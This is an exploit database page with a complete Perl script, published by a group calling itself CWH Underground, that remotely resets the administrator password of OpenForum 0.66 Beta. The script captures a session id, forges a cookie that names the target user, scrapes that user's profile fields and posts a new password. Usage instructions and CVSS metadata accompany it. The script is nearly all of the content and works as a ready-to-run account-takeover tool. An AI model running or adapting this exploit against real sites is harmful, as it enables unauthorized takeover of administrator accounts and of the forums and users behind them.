OpenForum 0.66 Beta Remote Reset Admin Password Exploit

2009.08.27
Credit: CWH
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w #======================================================== #OpenForum 0.66 Beta Remote Reset Admin Password Exploit #======================================================== # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 29 November 2008 #SITE : cwh.citec.us # # ##################################################### #APPLICATION : OpenForum #VERSION : 0.66 Beta #DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip ########################## #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK ########################## use LWP; use HTTP::Request; use HTTP::Request::Common; print "\n==================================================\n"; print " Openforum 0.66 beta Remote Reset Admin Password exploit \n"; print " \n"; print " Discovered By CWH Underground \n"; print "==================================================\n"; print " \n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; print " \n"; if ($#ARGV ne 2) { print "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\n"; print "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\n"; exit(); } $url = $ARGV[0]; $user = $ARGV[1]; $newpass = $ARGV[2]; if ($url !~ /^http:\/\//) { $url = "http://".$url; } print "[+] Target url: ".$url."\n\n"; $req = HTTP::Request->new (GET => $url); $req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18'); $req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'); $req->header (Accept_Language => 'en-us,en;q=0.5'); $ua = LWP::UserAgent->new; $response = $ua->request ($req); if ($response->code ne 200) { print "Error: Could not request for index page\n"; exit (); } $header = $response->headers->as_string; ($sessid) = $header =~ /sessid=(.+)\n/; print ":: Retreive session id ::\n"; print "[+] ".$sessid."\n\n"; $url =~ s/index\.php$/profile.php?user=$user/; #print $url; $req = HTTP::Request->new (GET => $url); $req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18'); $req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'); $req->header (Accept_Language => 'en-us,en;q=0.5'); $req->header (Cookie => 'sessid='.$sessid.'; userid='.$user); $response = $ua->request ($req); if ($response->code ne 200) { print "Error: Could not request for ".$user."'s profile page\n"; exit (); } $content = $response->content; $update = "1"; $adminaction = ""; ($email) = $content =~ /\"email\" value=\"(.*?)\"/; ($signature) = $content =~ /\"signature\">(.*?)<\/textarea>/; $day = ""; $month = ""; $year = ""; ($website) = $content =~ /\"website\" value=\"(.*?)\"/; ($name) = $content =~ /\"name\" value=\"(.*?)\"/; ($phone) = $content =~ /\"phone\" value=\"(.*?)\"/; ($city) = $content =~ /\"city\" value=\"(.*?)\"/; ($location) = $content =~ /\"location\" value=\"(.*?)\"/; $sytle = ""; $submit = "Update!"; print ":: Update new password ::\n\n"; $url =~ s/\?user=admin//; $response = $ua->request (POST $url, User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18', Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', Accept_Language => 'en-us,en;q=0.5', Cookie => 'sessid='.$sessid.'; userid='.$user, Content_Type => 'form-data', Content => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name, phone => $phone, city => $city, location => $location, password => $newpass, submit => $submit] ); if ($response->code ne 200) { print "Error: Could not request for profile page\n"; exit (); } $content = $response->content; if ($content =~ /<br>updated<br><table width=\"100%\">/) { print "[+] Exploit Success\n"; print "[+] New admin's password: ".$newpass."\n"; } else { print "[+] Exploit Failed\n"; }

References:

http://xforce.iss.net/xforce/xfdb/46969
http://www.securityfocus.com/bid/32536
http://www.milw0rm.com/exploits/7291


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top